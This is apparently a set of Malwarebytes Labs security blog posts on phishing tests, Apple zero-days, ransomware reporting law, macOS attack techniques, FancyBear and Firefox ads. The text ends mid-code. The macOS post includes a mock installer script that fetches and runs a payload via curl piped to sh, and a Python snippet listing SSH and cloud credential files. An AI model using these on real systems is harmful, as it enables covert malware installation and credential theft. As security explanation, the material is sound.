IT NEWS

The joy of phishing your employees

Many companies set up phishing test programs for their employees, often as part of a compliance requirement involving ongoing employee education on security topics. The aim of these programs is to train employees to spot a malicious link, avoid clicking it, and forward it to the appropriate responder, but most programs do not meaningfully achieve this. Let’s take a look at some common pitfalls and how to step around them.

You’re annoying your employees

Click-through rates on a real phish average between 10 and 33 percent among untrained users, depending on which security vendor you ask. But test phishes are sent to everyone, indiscriminately, taking time and energy away from those who are already more or less doing the right thing.

And while an organizational baseline is useful, and compliance can mandate a certain degree of repetition, repeatedly testing all employees without any sort of targeting can create security blindness on their part. There’s also often a lack of real-world tactics on the tester’s part, due to the need to hit large numbers of people at the same time.

A better solution is to conduct infrequent, all-hands tests as a baseline, then take a look at your failures. Do you have clusters, and where are they? What job function is most common in the failures, and how does that map to overall security risk? A repeated failure in Marketing has a different impact than one in Finance.
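This kind of failure clustering is straightforward to sketch in a short script, assuming you can export per-user test results from your phishing platform (the field names and departments below are illustrative, not any particular vendor’s format):

```python
from collections import Counter

# Toy phish-test results; in practice these come from your
# phishing platform's export. Field names are illustrative.
results = [
    {"user": "alice", "dept": "Finance", "clicked": True},
    {"user": "bob", "dept": "Finance", "clicked": True},
    {"user": "carol", "dept": "Marketing", "clicked": True},
    {"user": "dave", "dept": "Engineering", "clicked": False},
    {"user": "erin", "dept": "Finance", "clicked": False},
]

# Count failures (clicks) and totals per department to find clusters.
failures = Counter(r["dept"] for r in results if r["clicked"])
totals = Counter(r["dept"] for r in results)

for dept, total in totals.items():
    count = failures.get(dept, 0)
    print(f"{dept}: {count}/{total} failed ({count / total:.0%})")
```

From there, each department’s failure rate can be weighed against the business risk that department carries.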

With a good grasp of where your risk is, you can start focusing on problem areas of the organization with challenging, more frequent tests that use real-world tactics. While an all-hands phish might be an untargeted credential harvester, a high-risk phish test might look more like a malicious invoice sent by a fake vendor to a select group in the Finance department.

You’re not including execs

Executives are frequently not included in enterprise security testing, most likely due to difficulty getting buy-in on a topic that some C-suites view as esoteric. They are also the population most likely to engage in off-channel communications like SMS or bring your own device (BYOD) mobile mail using unsupported clients. However, a successfully phished executive can cause greater dollar losses to the organization than anyone else. While a single compromised credential pair at the ground level is typically a recoverable incident, business email compromise (BEC) aimed at an executive has caused up to $121 million in single-incident losses.

Successful inclusion of executives in a phishing training program would involve spearphishing, rather than a canned phish. The key indicator of a well-formed phish is mirroring the tactics found in the wild, so your high-value targets require a high effort pitch. Make sure that your phish test vendor includes a markup editor to construct custom phishes from scratch so that you can alternate between a canned mass mailer and a laser-focused spearphish, as needed.

You’re not changing your approach

Just as security staff can get alert fatigue and start missing important alarms from their tooling, non-technical staff can get test fatigue and start associating threats with one particular phish format that you use too much. Best practice should include frequent rotation of pitch type and threat type; malicious link, malicious attachment, and pure scam threats present differently and have their own threat ecosystems that warrant their own test formats.

If you’ve been using your test failures to highlight problem areas, that’s a great place to start varying how you conduct your tests. A failure cluster in a Finance department would respond fairly well to attachment-based phish tests, with pitch text focused around payment-themed keywords. Given that the impact of a breach in that department would also be high, more frequent and more difficult tests give better outcomes over the long term. The key point is that phish tests are sensors for organizational risk and should be tuned for accuracy frequently.

You’re not using the data

Okay, so you’ve checked that compliance tick box, created a test schedule that zeroes in on your problem areas over time, and you’re running custom spearphishes against your execs. You can call it a day, right?

Hitting these marks can give you a large security advantage over other companies, but to realize the full advantages of a security training program, you need to start sifting through the data that the program generates.

A great place to start is looking at where your failures sit. Are they evenly distributed, or do they cluster in particular departments? Are they individual contributors, or management? More importantly, which types of phishes do they click on most?

All of these questions can drive identification of high risk areas of the company, as well as prioritize which security controls should be implemented first. Rather than a top-down command approach, looking at the impact of a simulated attack can provide a clear view of where to start with a broader security improvement program.

If it’s not fun, you’re doing it wrong

Last and most importantly, this should be fun. The more creativity and variety injected into the process by security staff, the more effective the user awareness will be. And that doesn’t just extend to phish variety—user reports can and should be acknowledged at the organizational level.

Users can submit phish pitches, or preferred organization targets. Some phish test vendors even include stats broken out by department or manager that lend themselves very well towards friendly competition. Engaging employees beyond “Don’t do that” not only creates better security outcomes, but it tends to create better communication outcomes throughout a company.

Most corporate phishing programs do not meet their stated goals. The reasons include overweighting compliance goals to the exclusion of others, complacency in test format, vendor choices that make it tough to analyze the program’s data, and failure to dedicate resources to testing. These problems are largely avoidable if an organization shifts the focus of its testing programs from a checkbox to risk analysis.

Overall, folding phish testing into a broader look at cyber risk can provide hard data that can drive security controls and increase organizational buy-in.

The post The joy of phishing your employees appeared first on Malwarebytes Labs.

ExpressVPN made a choice, and so did I: Lock and Code S02E19

On September 14, the US Department of Justice announced that it had resolved an earlier investigation into an international cyber hacking campaign coming from the United Arab Emirates that has reportedly impacted hundreds of journalists, activists, and human rights defenders in Yemen, Iran, Turkey, and Qatar. The campaign, called Project Raven, has been in clandestine operation for years, and it has relied increasingly on a computer system called “Karma.”

But in a bizarre twist, this tale of surveillance abroad tapered inwards into a tale of privacy at home, as one of the three men named by the Department of Justice for violating several US laws—and helping build Karma itself—is Daniel Gericke, the chief information officer at ExpressVPN.

Today, on Lock and Code, host David Ruiz explores how these developments impacted his personal decision in a VPN service. For years, Ruiz had been a paying customer of the VPN, but a deep interest in surveillance and a background in anti-surveillance advocacy forced him to reconsider.

Tune in to hear the depth of the unveiled surveillance campaign, who it affected, for how long, and what role, specifically, Gericke had in it, on this week’s Lock and Code podcast, by Malwarebytes Labs.


You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.


Update now! Apple patches another privilege escalation bug in iOS and iPadOS

Apple has released a security update for iOS and iPadOS that addresses a critical vulnerability reportedly being exploited in the wild.

The update has been made available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one is listed as CVE-2021-30883 and allows an application to execute arbitrary code with kernel privileges. Kernel privileges can be achieved by using a memory corruption issue in the “IOMobileFrameBuffer” component.

Kernel privileges are a serious matter as they offer an attacker more than administrator privileges. In kernel mode, the executing code has complete and unrestricted access to the underlying hardware. It can execute any CPU instruction and reference any memory address. Kernel mode is generally reserved for the lowest-level, most trusted functions of the operating system.

Researchers have already found that this vulnerability is exploitable from the browser, which makes it extra worrying.

Watering holes are used as a highly targeted attack strategy. The attacker infects a website that they know the intended victim(s) visit regularly. Depending on the nature of the infection, the attacker can single out their intended target(s) or just infect anyone that visits the site unprotected.

IOMobileFrameBuffer

IOMobileFramebuffer is a kernel extension for managing the screen framebuffer. An earlier vulnerability in this extension, listed as CVE-2021-30807, was tied to the Pegasus spyware. This vulnerability also allowed an application to execute arbitrary code with kernel privileges. Coincidence? Or did someone take the entire IOMobileFramebuffer extension apart and save up the vulnerabilities for a rainy day?

Another iPhone exploit called FORCEDENTRY was found to be used against Bahraini activists to launch the Pegasus spyware. Researchers at Citizen Lab disclosed this vulnerability and code to Apple, and it was listed as CVE-2021-30860.

Undisclosed

As is usual for Apple, both the identity of the researcher that found the vulnerability and the circumstances under which the vulnerability was used in the wild are kept secret. Apple didn’t respond to a query about whether the previously found bug was being exploited by NSO Group’s Pegasus surveillance software.

Zero-days for days

Over the last few months Apple has had to close quite a few zero-days in iOS, iPadOS, and macOS. Seventeen, if I have counted correctly.

  • CVE-2021-1782 – iOS-kernel: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-1870 – WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-1871 – WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-1879 – WebKit: Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30657 – Gatekeeper: A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30661 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30663 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution.
  • CVE-2021-30665 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30666 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30713 – TCC: A malicious application may be able to bypass Privacy preferences. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30761 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30762 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30807 – IOMobileFrameBuffer: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. Tied to Pegasus (see above).
  • CVE-2021-30858 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30860 – CoreGraphics: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. This is FORCEDENTRY (see above).
  • CVE-2021-30869 – XNU: A malicious application may be able to execute arbitrary code with kernel privileges. Reportedly being actively exploited by attackers in conjunction with a previously known WebKit vulnerability.

And last but not least, the latest addition—CVE-2021-30883—which means that of the 17 zero-days that were fixed over the course of a handful of months, at least 16 were found to be actively exploited.

Update

Apple advises users to update to iOS 15.0.2 and iPadOS 15.0.2 which can be done through the automatic update function or iTunes.

Stay safe, everyone!


Ransom Disclosure Act would mandate ransomware payment reporting

In an effort to better understand and clamp down on the ransomware economy and its related use of cryptocurrencies, US Senator and past presidential hopeful Elizabeth Warren and US House Representative Deborah Ross introduced a new bill last week that would require companies and organizations to report any paid ransomware demands to the Secretary of the Department of Homeland Security.

“Ransomware attacks are skyrocketing, yet we lack critical data to go after cybercriminals,” said Senator Warren in a prepared release. “My bill with Congresswoman Ross would set disclosure requirements when ransoms are paid and allow us to learn how much money cybercriminals are siphoning from American entities to finance criminal enterprises—and help us go after them.”

If passed, the “Ransom Disclosure Act” would require a broad set of companies, local governments, and nonprofits that actually pay off ransomware demands to report those payments to the government. Companies would need to report this information within 48 hours of paying a ransom.

Specifically, those affected by the bill would need to tell the Secretary of the Department of Homeland Security:

  • The date on which such ransom was demanded
  • The date on which such ransom was paid
  • The amount of such ransom demanded
  • The amount of such ransom paid

Companies would also need to disclose what currency they paid the ransom in, including whether the payment was made with any cryptocurrency. Companies would also have to offer “any known information regarding the identity of the actor demanding such ransom.”
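Taken together, a disclosure under the bill amounts to a small, fixed record. The sketch below is purely hypothetical; the bill prescribes the data points, not a format or any field names:

```python
from dataclasses import dataclass
from datetime import date

@dataclass
class RansomDisclosure:
    # The four dates/amounts the bill enumerates
    date_demanded: date
    date_paid: date
    amount_demanded_usd: float
    amount_paid_usd: float
    # Currency used, including whether it was cryptocurrency
    currency: str
    paid_in_cryptocurrency: bool
    # Any known information about the actor demanding the ransom
    actor_information: str = "unknown"

# Illustrative example record
report = RansomDisclosure(
    date_demanded=date(2021, 10, 1),
    date_paid=date(2021, 10, 2),
    amount_demanded_usd=500_000.0,
    amount_paid_usd=250_000.0,
    currency="BTC",
    paid_in_cryptocurrency=True,
)
```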

The bill’s focus on cryptocurrencies acknowledges the technology’s core role in ransomware today; for years, virtually every significant ransomware payment has been made in crypto. But this reliance seems to finally be catching up with ransomware criminals: cryptocurrency provides only modest pseudonymity while generating remarkably detailed transaction records, and international police are now excelling at following those records.

In June, the US Department of Justice announced that, after following a series of cryptocurrency transactions across cyberspace, it eventually retrieved much of the ransomware payment that Colonial Pipeline paid to recover from its own ransomware attack in May. And earlier in October, Europol said it provided “crypto-tracing support” when the FBI, the French National Gendarmerie, and the Ukrainian National Police seized $375,000 in cash and another $1.3 million in cryptocurrencies during related arrests against “two prolific ransomware operators known for their extortionate ransom demands (between €5 to €70 million).”

This work, while encouraging in the fight against ransomware, largely happens in the dark, as ransomware payments made by companies are still kept considerably private. The Ransom Disclosure Act, then, seeks to shine a light on that darkness to better aid the fight. Said US House Representative Ross:

“Unfortunately, because victims are not required to report attacks or payments to federal authorities, we lack the critical data necessary to understand these cybercriminal enterprises and counter these intrusions.”

The Ransom Disclosure Act would also require the Secretary of Homeland Security to develop penalties for non-compliance and to, one year after the passage of the bill, publish a database on a public website that includes ransom payments made in the year prior. That database must be accessible to the public, and it must include the “total dollar amount of ransoms paid” by companies, but the companies’ identifying information must be removed. The information gleaned from the incoming reports must also be packaged into a study by the Secretary of Homeland Security that specifically explores “the extent to which cryptocurrency has facilitated the kinds of attacks that resulted in the payment of ransoms by covered entities,” and the Secretary of Homeland Security must also then present the findings of that study to Congress.

Finally, according to the bill, individuals who make ransomware payments after personally being hit with ransomware must also have a way to voluntarily report their information to the government if they so choose.


Inside Apple: How macOS attacks are evolving

The start of fall 2021 saw the fourth Objective by the Sea (OBTS) security conference, which is the only security conference to focus exclusively on Apple’s ecosystem. As such, it draws many of the top minds in the field. This year, those minds, having been starved of a good security conference for so long, were primed and ready to share all kinds of good information.

Conferences like this are important for understanding how attackers and their methods are evolving. Like all operating systems, macOS presents a moving target to attackers as it acquires new features and new forms of protection over time.

OBTS was a great opportunity to see how attacks against macOS are evolving. Here’s what I learned.

Transparency, Consent, and Control bypasses

Transparency, Consent, and Control (TCC) is a system for requiring user consent to access certain data, via prompts confirming that the user is okay with an app accessing that data. For example, if an app wants to access something like your contacts or files in your Documents folder on a modern version of macOS, you will be asked to allow it before the app can see that data.

A TCC prompt asking the user to allow access to the Downloads folder

In recent years, Apple has been ratcheting down the power of the root user. Once upon a time, root was like God—it was the one and only user that could do everything on the system. It could create or destroy, and could see all. This hasn’t been the case for years, with things like System Integrity Protection (SIP) and the read-only signed system volume preventing even the root user from changing files across a wide swath of the hard drive.

TCC has been making inroads in further reducing the power of root over users’ data. If an app has root access, it still cannot even see—much less modify—a lot of the data in your user folder without your explicit consent.

This can cause some problems. For example, antivirus software such as Malwarebytes needs to be able to see everything it can in order to best protect you. But even though some Malwarebytes processes are running with root permissions, they still can’t see some files. Thus, apps like this often have to require the user to give a special permission called Full Disk Access (FDA). Without FDA, Malwarebytes and other security apps can’t fully protect you, but only you can give that access.

This is generally a good thing, as it puts you in control of access to your data. Malware often wants access to your sensitive data, either to steal it or to encrypt it and demand a ransom. TCC means that malware can’t automatically gain access to your data if it gets onto your system, and may be a part of the reason why we just don’t see ransomware on macOS.

TCC is a bit of a pain for us, and a common point of difficulty for users of our software, but it does mean that we can’t get access to some of your most sensitive files without your knowledge. This is assuming, of course, that you understood the FDA prompts and what you were agreeing to, which is debatable. Apple’s current process for assigning FDA doesn’t make that clear, and leaves it up to the app asking for FDA to explain the consequences. This makes tricking a user into giving access to something they shouldn’t pretty easy.

However, social engineering isn’t the only danger. Many researchers presenting at this year’s conference talked about bugs that allowed them to get around the Transparency, Consent, and Control (TCC) system in macOS, without getting user consent.

Andy Grant (@andywgrant) presented a vulnerability in which a remote attacker with root permissions can grant a malicious process whatever TCC permissions are desired. The process involves creating a new user on the system, then using that user to grant the permissions.

Csaba Fitzl (@theevilbit) gave a talk on a “Mount(ain) of Bugs,” in which he discussed another vulnerability involving mount points for disk image files. Normally, when you connect an external drive or double-click a disk image file, the volume is “mounted” (in other words, made available for access) within the /Volumes directory. If you connect a drive named “backup”, for example, it becomes accessible on the system at /Volumes/backup. This is the disk’s “mount point.”

Title slide of Csaba Fitzl’s “Mount(ain) of Bugs” talk

Csaba was able to create a disk image file containing a custom TCC.db file. This file is a database that controls the TCC permissions that the user has granted to apps. Normally, the TCC.db file is readable, but cannot be modified by anything other than the system. However, by mounting this disk image while also setting the mount point to the path of the folder containing the TCC.db file, he was able to trick the system into accepting his arbitrary TCC.db file as if it were the real one, allowing him to change TCC permissions however he desired.

There were other TCC bypasses mentioned as well, but perhaps the most disturbing is the fact that there’s a fairly significant amount of highly sensitive data that is not protected by TCC at all. Any malware can collect that data without difficulty.

What is this data, you ask? One example is the .ssh folder in the user’s home folder. SSH is a program used for securely gaining command line access to a remote Mac, Linux, or other Unix system, and the .ssh folder is the location where certificates used to authenticate the connection are stored. This makes the data in that folder a high-value target for an attacker looking to move laterally within an organization.

There are other similar folders in the same location that can contain credentials for other services, such as AWS or Azure, which are similarly wide open. Also unprotected are the folders where data is stored for any browser other than Safari, which can include credentials if you use a browser’s built-in password manager.
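To illustrate how exposed this data is, here is a sketch of the enumeration any unprivileged process could perform without triggering a single consent prompt. The folder list is illustrative; the point is that nothing in TCC stands between a process and these paths:

```python
import os

# Home-directory folders that commonly hold credentials and, per the
# conference talks, sit outside TCC's protection. List is illustrative.
CREDENTIAL_DIRS = [".ssh", ".aws", ".azure"]

def find_unprotected_credentials(home: str) -> dict[str, list[str]]:
    """Enumerate files in credential folders, as any unprivileged
    process could do without a consent prompt appearing."""
    found = {}
    for name in CREDENTIAL_DIRS:
        path = os.path.join(home, name)
        if os.path.isdir(path):
            found[name] = sorted(os.listdir(path))
    return found
```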

Now, admittedly, there could be some technical challenges to protecting some or all of this data under the umbrella of TCC. However, the average IT admin is probably more concerned about SSH keys or other credentials being harvested than about an attacker being able to peek inside your Downloads folder.

Attackers are doing interesting things with installers

Installers are, of course, important for malware to get onto a system. Often, users must be tricked into opening something in order to infect their machine, and speakers discussed a variety of techniques attackers use to accomplish this.

One common method for doing this is to use Apple installer packages (.pkg files), but this is not particularly stealthy. Knowledgeable and cautious folks may choose to examine the installer package, as well as the preinstall and postinstall scripts (designed to run exactly when you’d expect by the names), to make sure nothing untoward is going on.

However, citing an example used in the recent Silver Sparrow malware, Tony Lambert (@ForensicITGuy) discussed a sneaky method for getting malware installed: the oft-overlooked Distribution file.

The Distribution file is found inside Apple installer packages and is meant to convey information and options for the installer. However, JavaScript code can also be inserted into this file and run at the beginning of the installation, nominally to determine whether the system meets the requirements for the software being installed.

In the case of Silver Sparrow, however, the installer used this script to download and install the malware covertly. If you clicked Continue in the dialog shown below, you’d be infected even if you then opted not to continue with the installation.

An Apple installer asking the user to allow a program to run to determine if the software can be installed.
Click Continue to install malware
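As a rough mock-up (not Silver Sparrow’s actual file), a Distribution file abusing the installation-check hook might look like the following. The element names follow Apple’s Distribution format, `system.run` is the installer JavaScript call for executing commands, and `payload.example` along with the package identifiers are placeholders:

```xml
<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
    <title>Example App</title>
    <!-- The installation-check script runs early in the install flow,
         before any files are actually copied to disk. -->
    <installation-check script="installCheck()"/>
    <script>
    <![CDATA[
    function installCheck() {
        // A legitimate use: verify OS version, free disk space, etc.
        // Silver Sparrow instead abused this hook to fetch and run
        // its real payload via a shell command.
        system.run("/bin/sh", "-c",
                   "curl -s https://payload.example/install.sh | sh");
        return true;
    }
    ]]>
    </script>
    <choices-outline>
        <line choice="default"/>
    </choices-outline>
    <choice id="default" title="Example App">
        <pkg-ref id="com.example.app"/>
    </choice>
    <pkg-ref id="com.example.app" version="1.0">#app.pkg</pkg-ref>
</installer-gui-script>
```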

Another interesting trick Tony discussed was the use of payload-free installers. These are installers that actually don’t contain any files to be installed, and are really just a wrapper for a script that does all the installation (likely via the preinstall script, but also potentially via Distribution).

Normal installer scripts will leave behind a “receipt,” which is a file containing a record of when the installation happened and what was installed where. However, installers that lack an official payload, and that download everything via scripts, do not leave behind such a receipt. This means that an IT admin or security researcher would be missing key information that could reveal when and where malware had been installed.
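On a real Mac, `pkgutil --pkgs` lists these receipts; as a sketch, an admin could also enumerate them directly, since receipts are conventionally stored as paired .plist and .bom files under /var/db/receipts. A payload-free installer leaves nothing here, which is exactly the gap described above:

```python
import os

# Conventional location of installer receipts on macOS.
RECEIPTS_DIR = "/var/db/receipts"

def installed_package_ids(receipts_dir: str = RECEIPTS_DIR) -> list[str]:
    """Return package identifiers that left a receipt behind.

    Each receipt is a <package-id>.plist (metadata) alongside a
    <package-id>.bom (file manifest)."""
    if not os.path.isdir(receipts_dir):
        return []
    return sorted(
        name[: -len(".plist")]
        for name in os.listdir(receipts_dir)
        if name.endswith(".plist")
    )
```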

Chris Ross (@xorrior) discussed some of these same techniques, but also delved into installer plugins. These plugins are used within installer packages to create custom “panes” in the installer. (Most installers go through a specific series of steps prescribed by Apple, but some developers add additional steps via custom code.)

These installer plugins are written in Objective-C, rather than scripting languages, and therefore can be more powerful. Best of all, these plugins are very infrequently used, and thus are likely to be overlooked by many security researchers. Yet Chris was able to demonstrate techniques that could be used by such a plugin to drop a malicious payload on the system.

Yet another issue was presented in Cedric Owens’ (@cedowens) talk. Although not related to an installer package (.pkg file), a vulnerability in macOS (CVE-2021-30657) could allow a Mac app to entirely bypass Gatekeeper, which is the core of many of Apple’s security features.

On macOS, any time you open an app downloaded from the Internet, you should at a minimum see a warning telling you that you’re opening an app (in case it was something masquerading as a Word document, or something similar). If there’s anything wrong with the app, Gatekeeper can go one step further and prevent you from opening it at all.

By constructing an app that was missing some of the specific components usually considered essential, an attacker could create an app that was fully functional, but that would not trigger any warnings when launched. (Some variants of the Shlayer adware have been seen using this technique.)


A week in security (Oct 4 – Oct 10)

Last week on Malwarebytes Labs

Other cybersecurity news


Google warns some users that FancyBear’s been prowling around

APT28, also known as FancyBear, is at the heart of another targeted campaign. This time, it’s sniffing around users of Google services. Some 14,000 people have been notified about a spear phish attempt looking to compromise accounts and access their files.

When did this happen?

Sometime in late September, according to the folks at Google. They didn’t go into detail about which industries were key targets, but this campaign “compromised 86% of the batch of warnings we sent for this month”.

Did Google catch all the malicious missives?

Shane Huntley, Director of Google’s Threat Analysis Group, mentioned that they blocked all the emails sent. That seems pretty conclusive. He goes into more detail in this thread:

As he notes, these warnings are primarily there to tell you to batten down the hatches for the next attack, whenever that might be.

Google has more information on this type of warning over on its security blog. If you ever see the below message, it’s definitely time to take action:

Government backed attackers may be trying to steal your password.

There’s a chance this is a false alarm, but we believe we detected government-backed attackers trying to steal your password. This happens to less than 0.1% of all Gmail users. We can’t reveal what tipped us off because the attackers will take note and change their tactics, but if they are successful at some point they could access your data or take other actions using your account.

Google recommends those affected join its Advanced Protection Program, which it says is its strongest protection for users at risk of targeted attacks.

What is the Advanced Protection Program?

Google’s Advanced Protection Program is another layer of security on top of regular Google protection, for those who need it. Physical security keys are a big feature of this program. The Chrome browser will also scan any and all files downloaded to a device. The program also refuses files from untrusted/unknown sources on Android, and makes it more difficult for rogue files to gain permissions on the device.

What else is Google doing in this realm?

Well, Google is very much about auto-enrolment for things like 2FA these days. Take-up on 2FA is quite low across many services on the web, and something like this can only help boost everyone’s security a bit more.

There’s also Google’s Security Checkup feature. At a glance, this will tell you about logged in devices, recent security activity, whether or not you have 2FA enabled, and your Gmail settings including which addresses you may have blocked. Many of the tabs reveal more and more information as you go. The 2-step column will tell you about phones using sign-in prompts, which Authenticator app you’re using and when it was added, phone numbers, and backup codes.

Don’t forget, you can also see a list of IP addresses using your Gmail account on the desktop in the bottom right hand corner (“last account activity”). This shows the type of access (web? mobile?), location/IP address, and the date/time of said activity.

These are all useful things to help ward off compromise, and also perhaps figure out where something might have gone wrong.

Should I be worried?

As above, the risk from something like FancyBear is as good as negligible for most people. If you work in a high-risk occupation, or deal with sensitive data you feel governments may be interested in, then yes, you could potentially be a target, though the odds are still very slim. If you’re a journalist, an activist, a human rights worker, a lawyer, or in some form of national security role, you may want to sign up for the Advanced Protection Program.

Everyone else should realistically be more concerned about common-or-garden malware, scams, phishes, and so on. The good news is that a lot of the basic security practices that ward off these attacks will also go some way towards warding off the big stuff. There’s no downside to adopting them…it’s win-win.

Do yourself a favour, and start digging through the multitude of security features Google has available. You’ll be surprised how easy it is to set most of it up, and you’ll be strengthening the security of your data at the same time.

The post Google warns some users that FancyBear’s been prowling around appeared first on Malwarebytes Labs.

Firefox reveals sponsored ad “suggestions” in search and address bar

Mozilla is trying a novel experiment into striking a balance between ad revenue generation and privacy protection by implementing a new way to deliver ads in its Firefox web browser—presenting them as “suggestions” whenever users type into the dual-use search and URL address bar.

The advertising experiment lies within a feature called “Firefox Suggest,” which was announced in September. According to Mozilla, Firefox Suggest “serves as a trustworthy guide to the better web, finding relevant information and sites to help you accomplish your goals.”

Much like other browsers, Firefox already offers users a bevy of suggestions depending on what they type into the search and address bar. That has included suggestions based on users’ bookmarks, browser histories, and their open tabs. But with the new Firefox Suggest feature, users will also receive suggestions from, according to Mozilla, “other sources of information such as Wikipedia, Pocket articles, reviews, and credible content from sponsored, vetted partners and trusted organizations.”

Though the explanation seems simple, the implementation is not.

That’s because there appear to be two different levels of suggestions for Firefox Suggest, which are only referred to by Mozilla as “Contextual suggestions,” and “improved results for Contextual Suggestions.”

On its support page for Firefox Suggest, Mozilla explicitly said that “contextual suggestions are enabled by default, but improved results through data sharing is only enabled when you opt-in.” That data sharing, covered in more detail below, broadly includes user “location, search queries, and visited sites,” Mozilla said.

How that additional data produces separate results, however, is unclear, because Mozilla remains frustratingly vague about the experience that users can expect if they have the default “contextual suggestions” enabled compared to users who have opted-in to “improved results for Contextual Suggestions.”

Under the heading “What’s on by default,” Mozilla said that, starting with Firefox version 92, users “will also receive new, relevant suggestions from our trusted partners based on what you’re searching for. No new types of data are collected, stored, or shared to make these new recommendations.”

Under the heading, “Opt-in Suggestions,” however, Mozilla only said that a “new type of even smarter” suggestion is being presented for some users that the company hopes will “enhance and speed up your searching experience.” Mozilla said that it “source[s] and partner[s] with trusted providers to serve up contextual suggestions related to your query from across the web,” which sounds confusingly similar to the default contextual suggestions that come from the company’s “trusted partners” and are “based on what you’re searching for.”

Fortunately, Mozilla offered a way for users to check if they’ve opted-in to the data sharing required for improved contextual suggestions. Unfortunately, when Malwarebytes Labs installed the latest version of Firefox (93.0 for MacOS), we could not find the exact language described in Mozilla’s support page.

Mozilla said that, for those who go into Firefox’s preferences:

“If you see ‘Contextual suggestions’ checked with the string ‘Firefox will have access to your location, search queries, and visited sites’, you have opted in. If you do not see that label then the default experience is enabled with no new kinds of data sharing.”

As shown in the image below, though we did find this setting in Firefox’s preferences, we did not find the exact language about “location, search queries, and visited sites.”

3 Firefox Suggest options

When Malwarebytes Labs tested Firefox Suggest, we could not produce any sponsored content results. We did, however, receive a Wikipedia suggestion on our search of “Germany” and a Firefox Pocket suggestion on our search of “chicken soup,” as shown below.

Firefox Germany
Firefox chicken soup

During our testing, we also could not find a way to opt-in to improved contextual suggestions. According to Mozilla, opting-in seems to currently rely on a notification message from Firefox asking users to specifically agree to sharing additional data. During our testing of Firefox Suggest, we did not receive such a message.

New model, new data

Firefox’s experiment represents a sort of double-edged sword of success.

In 2019, Mozilla decided to turn off third-party tracking cookies by default in its then-latest version of Firefox. It was a bold move at the time, but just months later, the privacy-forward browser Brave launched out of beta with similar anti-tracking settings turned on by default, and in 2020, Safari joined the anti-tracking effort, providing full third-party cookie blocking.

The anti-tracking campaign seems to have largely worked, as even Google has contemplated life after the third-party cookie, but this has put privacy-forward browsers in a difficult position. Advertising revenue can be vital to browser development, but online advertising is still rooted firmly in surreptitious data collection and sharing—the very thing these browsers fight against.

For its part, Brave has responded to this problem with its own advertising model, offering “tokens” to users who opt into advertisements that show up as notifications when using the browser. The tokens can be used to tip websites and content creators. Similar to Mozilla, Brave also vets the companies who use its advertising platform.

As to the role of advertising partners in Firefox Suggest, Mozilla said it attempts to limit data sharing as much as possible. “The data we share with partners does not include personally identifying information and is only shared when you see or click on a suggestion,” Mozilla said.

To run improved suggestions, Mozilla does need to collect new types of data, though. According to the company’s page explaining that data collection:

“Mozilla collects the following information to power Firefox Suggest when users have opted in to contextual suggestions.

  • Search queries and suggest impressions: Firefox Suggest sends Mozilla search terms and information about engagement with Firefox Suggest, some of which may be shared with partners to provide and improve the suggested content.
  • Clicks on suggestions: When a user clicks on a suggestion, Mozilla receives notice that suggested links were clicked.
  • Location: Mozilla collects city-level location data along with searches, in order to properly serve location-sensitive queries.”

Based on the types of data Mozilla collects for improved contextual suggestions, we might assume that users who opt-in will see, at the very least, suggestions that have some connection to their location, like perhaps sponsored content for an auto shop in their city when they’re looking up oil changes. The data on a user’s suggestion clicks might also help Mozilla deliver other suggestions that are similar to the clicked suggestions, as they may have a higher success rate with a user.

As to whether the entire experiment works? It’s obviously too early to tell, but in the meantime, Mozilla isn’t waiting around to generate some cash. Just this year, the company released a standalone VPN product. It is the only product that Mozilla makes that has a price tag.


GnuPG fixes a problem with Let’s Encrypt certificate chain validation

Despite advance warnings that a root certificate provided by Let’s Encrypt would expire on September 30, users reported issues with a variety of services and websites once that deadline hit. So what happened?

The problem

A number of high-profile tech and security companies noticed their products and services were affected by the certificate expiration: cloud computing services from Amazon, Google, and Microsoft; IT and cloud security services from Cisco; and Shopify, where sellers were unable to log in.

When a user’s browser arrives at your website, one of the first things it checks is the validity of the SSL certificate. An SSL certificate is a digital certificate that authenticates a website’s identity and enables an encrypted connection. SSL certificates are issued by a Certificate Authority (CA), and most browsers will accept certificates issued by hundreds of different CAs. Let’s Encrypt is a non-profit CA that provides digital certificates for free, and millions of websites rely on its services.

If the certificate, or the root certificate that signed it, has expired, the browser issues a warning that the site may not be secure or that the connection is not private. At least 2 million people saw an error message on their phones, computers, or smart gadgets due to the certificate issue.
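The expiry part of that check can be sketched in a few lines of Python. This is an illustrative helper, not any browser’s actual implementation: it only parses the `notAfter` timestamp as returned by Python’s `ssl.SSLSocket.getpeercert()` and measures the time left, whereas a real client also validates the whole chain against its trust store.

```python
# Illustrative sketch: how much life is left on a certificate, given
# the OpenSSL-style notAfter string that Python's
# ssl.SSLSocket.getpeercert() returns for a live connection.
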